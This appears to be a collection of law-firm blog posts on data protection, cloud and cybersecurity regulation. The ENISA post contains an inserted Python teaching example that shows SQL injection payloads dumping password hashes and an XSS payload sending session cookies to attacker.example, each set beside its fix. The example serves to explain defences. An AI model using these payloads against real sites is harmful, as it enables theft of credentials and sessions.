The new guidance differs from the 2001 version in that it does not include mechanisms for assessing the sensitivity of data processing that had been included in the prior guidance, which would have aided controllers in determining what measures should be implemented in specific situations.

The guidance has been released just as a new Bill on data security is scheduled to be introduced to the Dutch Parliament some time in April; it includes a breach notification obligation and a maximum fine of €200,000 for non-compliance.

ICANN Launches 'Trademark Clearinghouse' for New gTLDs

This post was written by Gregory S. Shatan, Brad R. Newberg and Judith L. Harris.

The Internet Corporation for Assigned Names and Numbers (ICANN) continues its efforts to globally expand the number of new gTLDs (the part of an Internet address to the right of the dot, such as .com). As the plans for expansion have been developing over the past few years, various groups have raised concerns regarding potential issues, including trademark infringement, cybersquatting and cybercrime. Reluctantly, ICANN developed a very limited set of additional “rights protection mechanisms” (RPMs) that apply solely to the new gTLDs. On March 26, ICANN launched the Trademark Clearinghouse (TMCH). Brand owners will need to register their marks in the TMCH in order to participate in two of these RPMs – Sunrise registration periods and Trademark Claims notices. Now, brand owners will need to decide which marks, if any, they will register in the TMCH, based on their desire to participate in Sunrises and the Trademark Claims system. With significant costs, questionable rewards and unknown risks, the decision will not be an easy one.

For a more detailed analysis, click here to read the issued Client Alert.

The Article 29 Working Party tackles the most contested elements of the new Data Protection Regulation

This post was written by Cynthia O'Donoghue.

The Article 29 Working Party (“Art. 29 WP”), which has already released two opinions (WP191 and WP199) regarding the draft General Data Protection Regulation (“Regulation”), has issued a statement and two accompanying annexes addressing some of the most heavily debated elements. The statement addresses the relaxation of rules for the public sector, a one-stop shop for data controllers, the pseudonymisation of data, the standard of consent, cross-border transfers, a risk-based approach, and the household exemption. Many of the views expressed by the Working Party appear to be in direct opposition to a number of observations made by other organisations, such as ITRE (see also our blog and client alert regarding the ITRE’s opinion).

The Art. 29 WP vehemently opposes the concept that the public sector should have a different regulatory regime for data protection from that of the private sector, on the basis that data protection is a fundamental right that is not affected by the status of the data controller being a public body.

The Art. 29 WP seeks the inclusion of pseudonymised and encrypted data within the scope of ‘personal data’ on the basis that pseudonymisation and encryption are security techniques that do not change the inherently personal nature of the data.

The Art. 29 WP discourages removing the requirement for explicit consent because it is both essential to ensure that consent is not misused by data controllers, and goes to the heart of proving the validity of consent. It also expressed support for consent being invalid when obtained where there is a significant imbalance of power.

Permitting cross-border data transfers without the need for a binding mechanism was rejected by the Art. 29 WP. The Art. 29 WP’s statement advocated the introduction of Mutual Legal Assistance Treaties (“MLATs”) to govern disclosures of data not otherwise authorised under EU or EU member states’ national laws, where such disclosures would be based on important grounds of public interest. Without such MLATs, data controllers would continue to be prohibited from transferring data outside the EU even when subject to the court order of a third country.

The Art. 29 WP supports a risk-based and scalable approach to data protection, with risk depending not only on the size of the controller, but also on the nature and categories of the data being processed.

In relation to the household exemption, commonly relied upon by organisations that ask members or users to add their contacts, such as social media, the Art. 29 WP recommended removing the exemption when its use would result in gainful interest connected with a commercial activity.

This statement will be weighed by the LIBE Committee as part of determining which of the more than 3,000 suggested amendments to incorporate into the Regulation; but given that the Art. 29 WP is made up of the 27 EU member states’ data protection authorities, the Art. 29 WP statement is likely to be influential.

Japan plans to prepare comprehensive guidelines on anonymisation of 'personal data'

This post was written by Cynthia O'Donoghue and Taisuke Kimoto.

As part of the new Japan Revitalisation Programme, Japanese authorities plan to prepare and publish guidelines on anonymisation of personal data. The Cabinet Office of Japan hopes that this will promote the movement of information and property by clarifying the rules related to the use of non-personally identifiable data, and help with the agenda of promoting innovation and R&D.

Japan’s data protection law, the Act on the Protection of Personal Information (APPI), prohibits businesses from acquiring ‘personal information’ through unlawful means, but does not bar purchasing or selling personal information as such. At the same time, the law governs how personal data should be handled, including by using the data only for the purposes identified by the controller and notified to individuals. The anticipated guidance should help clarify the type and level of anonymisation required so that the data falls outside the APPI.

There is currently no guidance in Japan on how anonymisation should work in practice. The guidance, once issued, should facilitate the use of Big Data for product development and market research.

China's first national privacy protection guideline in effect as of 1 February

This post was written by Cynthia O'Donoghue and Zack Dong.

On 1 February 2013, China's first set of Personal Data Protection guidelines, the Guidelines for Personal Information Protection in Information Security Technology Public and Commercial Service Systems (the “Guidelines”), came into effect. The Guidelines were issued by the Ministry of Industry and Information Technology (“MIIT”), and apply to all organizations and entities in China except government administrative authorities.

Although not binding, the Guidelines nevertheless clarify key procedures for relevant organisations collecting personal information, and provide an accepted regulatory standard outlining how personal information should be collected, processed, transferred, and deleted.

The Guidelines propose eight principles, namely: (1) a clear purpose for collection, (2) collection of the minimum amount of data possible, (3) public notification of the collection, (4) user consent, (5) quality assurance, (6) security assurance, (7) good faith and (8) accountability. The Guidelines define personal information, differentiating between “personal sensitive information” and “personal general information,” similar to provisions in the EU Data Protection Directive 95/46/EC.

The Guidelines require consent to be obtained from the data subject before personal information can be collected and processed, although they are silent on how it is to be obtained. For general personal information, implied consent is sufficient, whereas for sensitive personal information, express consent is required. Furthermore, data subjects must be informed of the purpose of collection, means of collection, security protection measures implemented, and scope of use of the personal information prior to the collection.

Under the Guidelines, organisations will be required to delete personal information once the purpose for its collection has been met. Additionally, the collection of sensitive personal information of minors under 16 years of age without their guardian’s consent is prohibited.

The Guidelines prohibit unauthorized transfers of personal information from China to an offshore individual or organization. Cross-border transmission of personal information is permitted only upon express consent by the subject, specific authorisation by national laws and regulations, or approval by relevant and competent authorities.

Italian Court Acquits Google Executives

This post was written by Cynthia O'Donoghue.

Three senior Google executives, given six month suspended jail sentences in Italy in 2010 for data protection breaches relating to the content of a video post by a user in 2006, have been acquitted by an appellate court in Milan.

The Google executives, including Google’s chief privacy officer, were convicted following a trial which related to a video posted on Google Video in 2006 depicting an autistic boy being bullied by classmates. The clip was live for about two months and was only removed by Google following receipt of a complaint. In February 2010, an Italian court found the three executives criminally liable for data protection violations. The judgment stated that as a video hosting provider, Google controlled the processing of the data, and it failed to obtain consent from all parties depicted in the video in violation of the Italian Data Protection Code. The judgment received worldwide criticism since it resulted in an Internet service provider being held responsible for the content posted by its users.

According to a Reuters report, the appellate court held that "the possibility must be ruled out that a service provider, which offers active hosting, can carry out effective, pre-emptive checks of the entire content uploaded by its users."

ECJ to weigh in on Spanish contest with Google over the application of data protection laws

This post was written by Cynthia O'Donoghue and Katalina Chin.

As Google continues its legal battle with the Spanish Data Protection Authority (DPA), the Spanish High Court (Audiencia Nacional) has referred several questions to the European Court of Justice (ECJ). The questions cover whether individuals have the right to demand the removal and blocking of information contained within Internet search results, even though that information was lawfully collected and accurate at the time of collection. Such search results may have a negative or harmful effect on the individual since the information could potentially be available “over the lifetime of an individual and that of his descendants.”

The case at issue related to a person who, when searching his name, was provided with search results relating to a newspaper advertisement for the auction of his property stemming from an old and subsequently resolved debt. The individual had requested Google to remove the search result, and when it did not do so, complained to the Spanish Data Protection Agency, which upheld the complaint and required Google to amend the search results. As the advertisement had been published in a newspaper, Google felt that the search result should not be taken down, and appealed.

One of the issues referred to the ECJ is whether the Spanish court has jurisdiction over Google, Inc. as a data controller or whether the issue should be tried in a California court, since Google’s local subsidiary only sells advertising to the California parent. The Spanish DPA found jurisdiction on the basis that Google Spain has a sufficient presence in Spain, operates a Spanish top level domain (ccTLD), and processes personal data about Spanish citizens.

A second important question to be answered by the ECJ is whether Google can be classified as a “data controller,” rather than only a host. Google argues that it did not produce the information in question, but merely displayed it in search results, and that the data would disappear from the search index as soon as it was no longer available from the source web page. Additionally, Google asked the court to consider its right to freedom of expression. It argued that forcing it to remove the search results would be detrimental to the public interest, as “there are clear societal reasons” why information about valid legal material which still exists online should be publicly available.

The ECJ Advocate General is expected to publish an opinion on the matter on June 25, and the judges are expected to rule on the matter by the end of the year.

UK Information Commissioner's Office Releases 'Bring Your Own Device' Guidance

This post was written by Cynthia O'Donoghue.

The UK Information Commissioner’s Office (ICO) published guidance on ‘bring your own device’ (BYOD), given the tremendous increase in employees both connecting to, and seeking to be able to use their personal devices to connect to, their employers’ systems. The ICO reported that 47% of employees now use personal smartphones, laptops or tablets for work, but fewer than three out of 10 are provided with guidance from their employers.

The ICO’s guidance highlights the importance of keeping information secure when using BYOD schemes, and pointed out that data controllers remain responsible for the data, even when processed on employees’ personal devices.

The guidance aims to help organisations develop policies by pointing out the issues that data controllers should consider when adopting BYOD policies, including types of data accessible, locations of data storage, data transfer, the risk of data loss or leakage, the potential for blurring the distinction between personal and business use, and what to do upon the termination of employment. The guidance also addresses security considerations, including in particular, password procedures and encryption, device security capabilities, and dealing with loss or theft of a device, as well as device failure and support.

The ICO has recommended that employees seeking to take advantage of BYOD be issued clear instructions on the separation of data and on what types of personal data can and can’t be processed on their personal devices. The ICO also suggested limiting use of the cloud to where necessary, and suggested that it would behove organisations to register devices with a service that allows for remote location and wiping, should a device be lost or stolen.

While the ICO acknowledged that the cost of BYOD controls can be significant, those costs may pale in comparison with the reputational damage caused by serious data breaches, or the loss of an organisation’s proprietary and confidential information.

EU member states argue for watering down the proposed Data Protection Regulation

This post was written by Cynthia O'Donoghue.

The proposed new EU General Data Protection Regulation may need to be watered down. The far-reaching proposed draft, which was published in January 2012, aims to unify and strengthen the data protection laws across the 27 EU countries. However, the Financial Times reports that a memo drafted by the Irish presidency admits that “several member states have voiced their disagreement with the level of prescriptiveness of a number of the proposed obligations in the draft regulation.”

There appears to be a prevailing opinion among the member states that the burdens imposed by the draft Regulation must be reduced, especially the most commonly criticised elements, such as the requirement to obtain individuals’ explicit consent and the “right to be forgotten.” Several EU member states, like the UK (see our blog about the UK’s criticism), advocate a “risk-based” approach that would have as its focus whether a substantial threat to a person’s personal data exists. Several EU member states would like small companies spared from many of the compliance burdens contained in the proposed Regulation—an approach advocated by the American Chamber of Commerce.

Some member states, including the UK, would like to see the designation of a data protection officer reduced to an optional requirement. Germany and Belgium argue for the easing of rules related to the use of data by public institutions.

The lobbying for watering down the proposed Regulation has been openly criticised by a coalition of privacy groups, as well as by Jan Philipp Albrecht, the rapporteur for the draft regulation (see also our blog about Albrecht’s report on the proposed Regulation). Given the raging debate, it looks as though enough member states oppose the draft Regulation to block the entire proposal, unless the European Parliament and the European Commission heed the calls for compromise.

The UK Information Commissioner details the timeline of the EU data protection reforms

This post was written by Cynthia O'Donoghue.

The UK Information Commissioner’s Office (“ICO”) has published an explanation of the process and timeline of the proposed EU data protection reform and its involvement in the on-going negotiations.

According to the ICO, the proposed EU data protection reforms could “be one of the biggest changes to data protection that the (UK) has ever seen.” The changes will impact on all citizens of the UK to a certain degree; especially in relation to consent mechanisms and the controversial “right to be forgotten,” should it be incorporated into the law.

The five European Parliamentary committees – Civil Liberties, Justice and Home Affairs (LIBE); Industry, Research and Energy (ITRE); Legal Affairs (JURI); Employment and Social Affairs (EMPL); and Internal Market and Consumer Protection (IMCO) – are making progress on their amendments to the Proposed General Data Protection Regulation (the “Proposed Regulation”) and the Proposed Directive. Each committee must submit its own amendments prior to negotiating a consolidated version. The Council of the European Union, which consists of ministers from each Member State (including the UK’s Ministry of Justice), must also complete its impending amendments, before they and the European Parliament can approve a final text detailing the new rules.

Ireland is hoping to adopt the new rules by the end of June this year; however, this is widely believed to be an unrealistic target because certain Member States (including the UK) have criticised the proposal for a directly applicable Regulation, which they consider to be overly prescriptive, favouring instead the implementation of a Directive. Further concerns arise from the proposal that the Regulation will be confined to the private sector - the ICO and other EU data protection authorities have argued strongly against this.

The timescales put forward demonstrate the commitment to prioritising and finalising the complex process of creating a framework which strikes the right balance between protecting personal data and not overburdening business or stifling economic growth and innovation.

With discussions on the proposals already having taken three years, many have become disillusioned with the duration of the process. 2013 is set to be a crucial year in progressing negotiations, especially as the Commission is attempting to bring the reform into law by 2014, when the European Parliament and the Commission are due for re-appointment.

Payment Card Industry Security Standards Council publishes cloud computing guidelines for cardholder data

This post was written by Cynthia O’Donoghue.

In a bid to help organisations better understand their compliance obligations under the Payment Card Industry Data Security Standard (PCI DSS) when using cloud technology to collect, store or transmit credit card data, the Payment Card Industry Security Standards Council (PCI SSC) has published the PCI DSS Cloud Computing Guidelines Information Supplement.

Developed in collaboration with more than 100 global organisations representing banks, merchants, security assessors and technology vendors, the guidelines state that the PCI DSS will still apply “if payment card data is stored, processed or transmitted in a cloud environment”.

According to the PCI SSC, unless the cloud deployment model is truly private (on-site), security is a shared responsibility between the Cloud Service Provider (CSP) and its clients, with the levels of responsibility between the two depending on the type of cloud service model used.

Software as a Service (SaaS) enables clients to use the CSP’s applications through the cloud, resulting in the greatest loss of control over security and the lowest level of client responsibility. Platform as a Service (PaaS) allows clients to deploy their own applications onto the CSP’s cloud infrastructure, reducing their control to a lesser extent than SaaS and increasing their responsibilities. Infrastructure as a Service (IaaS) permits clients to use the CSP’s processing, storage and networks to deploy and run operating systems, applications and other software on a cloud infrastructure, giving the client a high level of control and responsibility. Security responsibility therefore generally migrates toward the client as the client moves from a SaaS model (least client responsibility) to an IaaS model (most client responsibility).

It is essential that clients understand their requirements so as to determine whether they will be met by a particular CSP. The guidelines recommend that clients undertake risk assessments to enable them to make an informed decision.

Where control is outsourced to the third-party CSP, the Council considers it essential for contractual agreements to be in place – and ongoing due diligence to be carried out – to ensure that the CSP is complying with the security levels required by the client and the PCI DSS. It warns that “if the security responsibilities are not properly assigned, communicated and understood, insecure configurations or vulnerabilities could go unnoticed and unaddressed, resulting in potential exploit and data loss.”

A recent study highlights worrying trends in the legal frameworks for cloud computing

This post was written by Cynthia O'Donoghue.

The Business Software Alliance (BSA) Global Cloud Computing Scorecard, released March 7, 2013, indicates that the legal frameworks for cloud computing are improving, but inconsistently and with some worrying trends. The study tracks year-over-year changes in the global cloud policy landscape. It assesses the relevant laws and regulations of 24 countries that together account for 80 percent of the global information and communications technology market, focussing on topics such as data portability, cybercrime, and information technology infrastructure.

This year’s study highlights an increasing number of countries adopting international norms aimed at building user trust while enabling innovation. Singapore was commended for having adopted the best of both the Asia-Pacific Economic Cooperation and the European Union policies. However, many of the world’s biggest IT markets fell in the ranking, including each of the six EU countries covered by the study. The UK fell from sixth to seventh place, partly because of the requirement for businesses to register their data processing with a regulator, which was seen as an unnecessary burden, and partly as a result of the UK’s failure to implement the Convention on Cybercrime in its entirety.

A number of countries were criticised, including South Korea, Indonesia, and Vietnam, for taking steps to effectively disconnect themselves from cloud computing by drafting legislation that would impose unnecessary formalities on cloud providers or by requiring them to establish national data centres. The BSA expressed concern that “governments are starting to chop up the cloud”, pointing out that if international service providers are blocked out of local markets, the economies of scale and efficiency, which cloud seeks to achieve, will be undermined. Protectionist policies should be shunned in favour of legal and regulatory frameworks that encourage innovation, and that can deliver benefits by ensuring confidence in the cloud through secure infrastructure, strong cybersecurity and respect of international data protection laws.

The European Parliament Committee on Civil Liberties, Justice and Home Affairs warns on the approach to fighting cybercrime and its relationship to cloud computing

This post was written by Cynthia O’Donoghue.

The use of cloud computing services is growing at an unprecedented rate, and brings with it concerns over the security of personal data stored on cloud servers. A recent study by the European Parliament’s Committee on Civil Liberties, Justice and Home Affairs (“LIBE”) argues that the main issue arising from the growing use of cloud computing is the loss of control over the security of individuals’ personal data. This is because control over personal data security is exercised solely by the cloud storage provider, with individual web users often having no knowledge or understanding of the security measures in place.

The study’s authors emphasise that cloud computing contributes to the growth of cross-border data transfers and poses major challenges to EU policy makers regarding combatting cybercrime and protecting citizens’ privacy. Alarmingly for EU citizens, the study warns that “mass surveillance” of non-U.S. citizens' data stored in the cloud, including through services such as Apple iCloud and Google Drive, is permitted through the controversial Foreign Intelligence Surveillance Act Amendments Act (“FISAAA”), which became law in early January 2013. Any data relating to U.S. foreign policy, stored on popular U.S.-based cloud servers, can be appropriated by U.S. authorities without prior consent, warning or indeed a warrant, as FISAAA "expressly permits purely political surveillance".

Although U.S. authorities will most likely target only organisations engaged in activities that are unlawful or potentially against U.S. interests, such as those associated with activists, protestors or political groups, the law represents a significant risk to EU privacy because it still gives U.S. authorities the power to access any EU data held on U.S. cloud servers. EU consumers should therefore consider carefully in which jurisdiction to store their data so as to ensure the greatest level of protection.

The Committee suggests introducing a legal definition of cybercrime and clarifying the legal concepts of "jurisdiction", "data processor" and "data controller" in relation to cloud computing within the EU, to allow a better understanding of its scope and easier measurement of the costs associated with cyber incidents. The study recommends that all EU citizens be made aware of any exposure of their sensitive data to third-country surveillance, since uninformed exposure could have a fundamental impact on the right to respect for private and family life enshrined in the EU Charter of Fundamental Rights.

European Network and Information Security Agency (ENISA) publishes report on the cybersecurity threat landscape

This post was written by Cynthia O'Donoghue.

The European Network and Information Security Agency (“ENISA”) has published its first independent overview of how the cyberthreat landscape has evolved over the past few years. The report identifies the most common and dangerous cyberthreats, the methods used by malicious users and potential avoidance measures for web users. ENISA’s findings have ramifications from both an EU and global perspective as the threats revealed have no geographic boundaries.

According to the report, “drive-by exploits” are the greatest and fastest-growing threat to the internet landscape. In a drive-by exploit, malicious code is injected into a website, often a legitimate site whose operators do not know they are hosting it, and when a user visits the page the code exploits a vulnerability in the browser or one of its plug-ins to install malware without any further action by the user. The malware can then be used to obtain personal information. This form of cyberattack is on the rise and is now being adapted to mobile devices.

The second-biggest cyberthreat identified by ENISA is malware in the form of Trojans (which carry backdoor capabilities) and worms (which self-replicate and spread on their own, with devastating effect). Cybercriminals use worms and Trojans to pull off sophisticated cyberscams involving theft of user credentials and personal data, and governments use them for cyberespionage.

Code injection is the third top threat: in recent years an increasing number of attacks and data breaches have been conducted against web applications using well-known techniques such as SQL injection (“SQLi”) and cross-site scripting (“XSS”). These attacks, which are popular amongst hacktivist groups, aim to extract data, steal credentials and take control of the targeted web server.
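The two injection techniques named above, as an added example that is not part of the original post or of the ENISA report: a Python profile lookup that splices user input into a SQL statement, the same lookup with a bound parameter, and an HTML greeting rendered with and without output escaping. The in-memory SQLite table, the user records and the payloads are all constructed for the demonstration; Python with the standard-library `sqlite3` and `html` modules is used so that it runs offline.

```python
import html
import sqlite3

# Constructed sample table: two users with made-up password hashes.
SAMPLE_USERS = [
    ("alice", "alice@example.com", "hash-of-alice-pw"),
    ("bob", "bob@example.com", "hash-of-bob-pw"),
]


def make_db():
    """Build an in-memory SQLite database seeded with SAMPLE_USERS."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT, pw_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, name):
    """Profile lookup that splices the caller-supplied name into the SQL text.

    Whatever the user types becomes part of the statement, so a single quote
    lets them close the string literal and append SQL of their own.
    """
    sql = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, name):
    """Same lookup with a bound parameter.

    The statement text is fixed; the driver passes the value separately, so
    quotes and SQL keywords in the input are only ever compared as data.
    """
    sql = "SELECT name, email FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


# Two classic SQLi payloads (constructed for this example).
TAUTOLOGY = "' OR '1'='1"                                   # always-true WHERE: dumps every row
UNION_DUMP = "' UNION SELECT name, pw_hash FROM users --"   # pulls credential hashes into the result


def render_greeting_vulnerable(display_name):
    """Reflects the name into HTML unescaped: a reflected/stored XSS sink."""
    return "<p>Hello, " + display_name + "</p>"


def render_greeting_hardened(display_name):
    """Escapes &, <, >, \" and ' so the browser renders the name as text."""
    return "<p>Hello, " + html.escape(display_name, quote=True) + "</p>"


# Constructed XSS payload that would exfiltrate the session cookie if executed.
XSS_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


if __name__ == "__main__":
    db = make_db()
    print("legitimate lookup :", lookup_vulnerable(db, "alice"))
    print("tautology (vuln)  :", lookup_vulnerable(db, TAUTOLOGY))
    print("tautology (safe)  :", lookup_hardened(db, TAUTOLOGY))
    print("union dump (vuln) :", lookup_vulnerable(db, UNION_DUMP))
    print("union dump (safe) :", lookup_hardened(db, UNION_DUMP))
    print(render_greeting_vulnerable(XSS_PAYLOAD))
    print(render_greeting_hardened(XSS_PAYLOAD))
```

Run as a script it prints each lookup side by side: the tautology payload returns both rows from the vulnerable function and nothing from the parameterised one, and the UNION payload pulls the `pw_hash` column into a query that was only meant to return names and e-mail addresses. The XSS half shows the same principle applied to the output side: the fix is not to strip `<script>` but to escape every metacharacter at the point where untrusted data meets HTML.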

Other cyberthreats include exploit kits, botnets, denial-of-service attacks, phishing and spam. ENISA emphasises that it is not just cybercriminals acting as the threat agents but also corporations attempting to gain competitive advantage, disgruntled employees, and terrorists who have expanded their activities into cyberspace.

In an era where social media has flourished, the report highlights the vulnerability of technologies such as cloud computing and big data sets, where the concentration of vast amounts of data in a few logical locations makes an attractive target for threat agents. ENISA suggests that many threats can be contained if sufficient risk management is undertaken and appropriate security measures are implemented.

Investors Show Growing Interest in Cybersecurity

This post was written by Cynthia O'Donoghue.

HBGary, developer of tools and services for protection from cyberspies and terrorists, conducted a new study discussing the impact of cyberattacks and data breaches on investor attitudes. The study, based on a survey of 405 U.S. investors, looked at investor attention to companies’ cybersecurity and which aspects of historical attack and breaches determined investment decisions.

The study highlights cybersecurity’s growing importance to investors, with more than 70 percent of those surveyed confirming they evaluate companies’ cybersecurity practices. A higher proportion, 78.1 percent of the survey participants, indicated they would be unlikely to consider investing in a company with a history of cyberattacks, and 68.7 percent would be disinclined to invest in a company with a history of data breaches.

The study notes that 66 percent of the investors were concerned with how a company responded to a cyberattack or data breach and only 25 percent were interested in the incident itself. This difference highlights that an organisation that suffers a breach must be seen to take decisive action both to remedy an incident and to ensure an effective response in order to avoid negatively impacting the company’s investment profile.

The study also looked at the type of incidents that were of most concern to an investor, with more than 57 percent viewing breaches of personal data more significant than incidents involving IP theft. Only 28.8 percent of investors expressed the opposite view.

This is a staggering outcome, given that IP and trade secret theft or loss is alleged to cost organisations billions of dollars, but it could be that the long-term impact and liability of the loss of personal data can be difficult to quantify. If the draft EU Data Protection Regulation gets passed by the European Parliament in its current form, cybersecurity breaches resulting in data loss could cost organisations up to 2 percent of their worldwide annual turnover, something that will likely result in an increased focus on cybersecurity due diligence when undertaking any investment decision.

You've Been Served... Through Facebook?

This post was written by Keri S. Bruce and Lisa B. Kim.

Courts and legislators alike have begun to give a person’s social media presence a new kind of legitimacy. We are seeing an upward trend towards allowing service of process in a lawsuit through communications on social media websites, like Facebook, where there is some reliability that the defendant will receive notice.

To read more on this story, check out the latest post on our sister blog, Legal Bytes.

German Federal Labor Court: Works Council May Itself Decide on Data Protection Measures to Be Applied on Its Computers

This post was written by Katharina A. Weimer and Dr. Thomas Fischl.

The German Federal Labor Court had to decide on a works council’s demand to be provided with a personal computer with a group account for access to the internet (as opposed to personalised internet access for the individual works council members). The labour court had denied the request; the higher regional labour court had reversed that decision. On appeal by the employer, the federal court upheld the decision that the employer has to provide non-identifiable internet access to the works council.

The works council asked for non-identifiable access so that each of its members could research freely on the internet without the employer being able to monitor or review who researched what, and for how long. Under the Works Constitution Act, an employer must provide the works council with the means necessary to conduct its business, including information and communication tools. Whether a specific device or tool is necessary is within the works council’s discretion, taking into account its own interests but also those of the employer. To comply with this provision, the employer had given the works council a personal computer holding the personal data needed for its tasks, including internet research, but with personalised internet access only. The works council is entitled to demand non-identifiable internet access, especially in light of the works agreement in place between the parties, which grants the employer certain monitoring permissions that the works council regards as a risk to carrying out its tasks without obstruction.

One of the employer’s arguments for insisting on personalised access was the requirement to provide appropriate data security measures under section 9 of the German Federal Data Protection Act (the “Act”), under which every data controller/processor must implement measures to ensure compliance with the Act, including that any automated processing and use of personal data, and the person acting, can be traced and verified.

The Federal Labor Court decided that the works council, being a part of the employer (and data controller with regard to the personal data contained on that computer in question) is itself responsible for complying with the requirements of the Act, including the implementation of appropriate technical and organizational security measures on the computer. The requirement to enable the tracking of any processing and use of personal data on that personal computer does not mean, however, that it must be traceable for the employer. It is sufficient if for instance the works council allocates identifiers to the individual works council members without providing the identifiers to the employer.

The decision strengthens the position of German works councils, as it gives them wide discretion regarding the implementation of data security measures, thereby limiting the employer’s options to maintain control over its IT systems.

DING-A-LING-A-LING: The FCC Enforcement Bureau Calling!

This post was written by Judith L. Harris.

While telemarketers, debt collectors and others wait for the Federal Communications Commission (FCC) to answer technical questions such as “EXACTLY what is an autodialer,” the FCC has just made clear that the agency, at least, knows one when it sees one! In companion orders released on Friday (3/15/13), the FCC issued citations to two robocallers (and their owners, principals and officers) for making millions of automatically dialed calls, and using prerecorded or artificial-voice messages (robocalls), to wireless phone numbers without prior authorization from the call recipients; and for failing to provide certain required identifying information in violation of the Telephone Consumer Protection Act (TCPA).

In its investigation, FCC staff members compared lists of the thousands of phone numbers, to which the scrutinized companies had made autodialed and/or prerecorded message calls, to an industry-standard, commercially available database of wireless numbers (assigned and ported) to establish which numbers called by the companies belonged to mobile phones. Then, just for good measure, the agency called a sampling of the numbers to see if any of the called parties had given prior consent to be contacted on their cellphones.

Anyone making robocalls should be aware that, once any call to a wireless phone is established, under the law, the burden switches to the calling party to establish that it had the prior consent necessary to call that phone using an auto-dialer and/or leaving a prerecorded or artificial-voice message. The importance of keeping good records when advance consent has been obtained (in writing in the case of telemarketing calls) cannot be over-emphasized.

While, at this stage, these two FCC citations only act as a warning, they require each company to certify within fifteen days that it has ceased making robocalls to wireless phones without prior authorization and that the calls it does make include the required identifications. If either entity violates its certification, it may then be found liable not only for the unlawful conduct following the certification, but for the original conduct that led to the citation in the first place.

As the FCC pointed out in the orders, a “subsequent forfeiture action based on just the first three hundred (300) of those violations, calculated at the statutory maximum of $16,000 per violation, would result in a potential forfeiture of four million, eight hundred thousand dollars ($4,800,000) against the Company.” In one of the cases, about 4.7 million violations occurred in just the three months of call records reviewed by the agency staff. You do the math…and this does not even take into consideration the inevitable piggy-back class actions that will be filed regardless of whether the entities ever again violate the TCPA.

If you are a telemarketer, a debt collector or anyone else who uses an autodialer or leaves an automated message regarding your business activities (and this aspect of the law even applies to political calling and charitable solicitations), it is important to evaluate the procedures you have in place to ensure compliance with the TCPA by all of your employees and agents. Don’t forget, you are responsible even if you outsource your calling to third-party vendors.

Implementing a BYOD Policy? Don't Forget About the Risks

This post was written by John W. Chapas.

Bring Your Own Device (BYOD) is an escalating trend by which employees are using their own portable computing devices, including tablets and smart phones, to access their employer’s system and data. Employers are faced with the challenging question of whether they should permit BYOD or only permit employees to access their system and data through company devices.

There are multiple reasons a company should implement a BYOD policy, but there are also associated risks and costs that must be considered.

For a more detailed analysis, click here.

European Parliament Committee on Industry, Research and Energy publish opinion on the proposed General Data Protection Regulation

This post was written by Cynthia O'Donoghue.

Following the lead of the Committee on Civil Liberties, Justice and Home Affairs (LIBE), which already released its draft report (see our prior blog) 20 February, the European Parliament Committee on Industry, Research and Energy (ITRE Committee) published its Draft Opinion on the proposed General Data Protection Regulation. This opinion has been submitted to LIBE, which has the task of consolidating amendments and voting on its own report at the end of April.

In the Draft Opinion, ITRE rapporteur Seán Kelly outlined his substantial support for the proposed Regulation and suggested that the changes should help avoid excessive administrative burdens for enterprises, and introduce a greater degree of flexibility, especially in terms of accountability and the notification requirements to supervisory bodies. The ITRE Committee, however, proposed significant amendments to the Regulation in an attempt to ease restrictions on companies by focusing on corporate governance, the use of impact assessments, and bringing increased clarity to the provisions. It has recommended significant alterations to the most contentious provisions, such as consent mechanisms; the rights of access, portability, and to be forgotten; the 24-hour breach notification requirement; and the sanctions regime.

For a more detailed analysis, click here to read the issued Client Alert.

UK Information Commissioner's Office presents article-by-article analysis of the proposed new General Data Protection Regulation

This post was written by Cynthia O'Donoghue.

Following the publication of its “further thoughts” on the European Commission’s proposed new data protection framework, the ICO has now published an in-depth, article-by-article analysis of the proposed General Data Protection Regulation (the Regulation). The ICO pointed out that this is an important opportunity to get the framework right, as it is likely to remain in force for many years. The paper reflects the ICO’s general concerns and expresses its opinion on some of the more contested elements of the Regulation.

The ICO reiterated the need for further clarity and expressed concern about the number of delegated acts of the European Commission provided for in the Regulation, on the basis that their use is likely to result in continued uncertainty for businesses and data subjects.

The ICO emphasises that the new data protection framework should promote a truly risk-based approach rather than focusing on administrative detail and compliance process at the expense of outcomes, which could encourage paper-only compliance. The ICO also voiced strong support for the concept of protection by design, so long as the model is principle-based to accommodate scalability and flexibility.

The ICO welcomed “the high standard of consent”, but raised concerns that some data controllers may be left without a lawful basis for processing, and criticised the unequivocal barring of consent obtained in cases of alleged “significant imbalance”, pointing out that consent can validly be obtained for employer-employee data processing. The ICO continues to advocate the inclusion of “pseudonymised” data within the definition of personal data, but floated the idea that individuals’ access rights should not apply to it.

While the ICO generally supports the new right to be forgotten, the paper acknowledges that it may be impossible to deliver in practice, because data in the public domain will often have been disseminated without the original data controller’s consent or knowledge, which could leave individuals with a false belief that the data can be erased. Despite acknowledging concerns about the right to portability’s potential impact on property rights and trade secrets, and admitting that it is not a “classical” element of data protection law, the ICO welcomed its inclusion, highlighting that it empowers consumers.

Supreme Court Ruling in Clapper v. Amnesty International Leaving Data Breach Class Actions in Danger?

This post was written by Mark S. Melodia and Paul Bond.

In Clapper v. Amnesty International, a group including journalists, human rights activists and labor leaders challenged the 2008 amendments to the Foreign Intelligence Surveillance Act. The amendments broadened the surveillance powers of the federal government with respect to communications outside the U.S.

Plaintiffs claimed that their work required open communication with persons around the globe and that they had incurred costs to prevent this government surveillance. A 5-4 decision was issued by the Supreme Court, where the majority (Alito, J.) found that the plaintiffs had no Article III standing to sue.

For a more detailed analysis, please click here to read the issued Client Alert.

Proposed Amendment Seeks to Pack More Punch Behind California's "Shine the Light" Law

This post was written by Lisa B. Kim, Steven Boranian and Joshua B. Marker.

A proposed amendment to California’s “Shine the Light” law seeks to require companies to disclose more detailed information about their data-sharing practices, while giving consumers the ability to bring class action lawsuits under the legislation.

Presently, Shine the Light requires companies doing business with California residents to make a detailed disclosure, upon the consumer’s request, of how personal information was shared for direct-marketing purposes. For more details on how the current legislation works, click here.

